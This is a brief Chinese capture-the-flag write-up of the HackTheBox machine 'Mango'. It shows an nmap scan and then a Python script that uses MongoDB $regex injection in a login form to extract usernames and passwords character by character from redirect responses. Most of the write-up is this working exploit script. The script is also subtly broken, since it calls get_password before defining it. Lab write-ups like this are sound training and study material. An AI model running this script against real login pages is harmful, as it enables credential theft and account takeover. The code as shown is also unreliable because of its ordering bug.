nmap扫描常见端口，发现开启了22、80、443。

# nmap -T4 -sS -sV -sC 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 01:51 EST
Nmap scan report for 10.10.10.162
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.07 seconds

在nmap的443端口输出信息中看到staging-order.mango.htb，加到/etc/hosts中后访问

NoSQL注入脚本：

#!/usr/bin/env python

import requests
import string
url = "http://staging-order.mango.htb/index.php"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "icc5dp0dufeh68mctc9dlne8jd"}

possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]


def get_usernames():
    usernames = []
    params = {
        "username[$regex]":"", 
        "password[$regex]":".*", 
        "login": "login"
    }
    
    for c in possible_chars:
        username = "^" + c
        params["username[$regex]"] = username + ".*"
        
        pr = requests.post(url, 
            data=params, 
            headers=headers, 
            cookies=cookies, 
            allow_redirects=False
        )
        
        if int(pr.status_code) == 302:
            print("Found username starting with "+c)
            while True:
                for c2 in possible_chars:
                    params["username[$regex]"] = username + c2 + ".*"
                    if int(requests.post(url, data=params, headers=headers, cookies=cookies, allow_redirects=False).status_code) == 302:
                        username += c2
                        print(username)
                        break
                if c2 == possible_chars[-1]:
                    print("Found username: " +username[1:])
                    usernames.append(username[1:])
                    break
    return usernames
for u in get_usernames():
    get_password(u)


def get_password(username):
    print("Extracting password of " + username)
    params = {
        "username":username,
        "password[$regex]":"",
        "login": "login"
    }
    password = "^"
    while True:
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            pr = requests.post(url, 
            	data=params,
            	headers=headers, 
            	cookies=cookies, 
            	allow_redirects=False)
            if int(pr.status_code) == 302:
                password += c
                break
        if c == possible_chars[-1]:
            print ("Found password "+password[1:].replace("\\", "")+" for username "+username)
            return password[1:].replace("\\", "")

总结

NoSQL Injection

参考

https://mp.weixin.qq.com/s/ffHB9ZKWrUQuipWGPD0H5w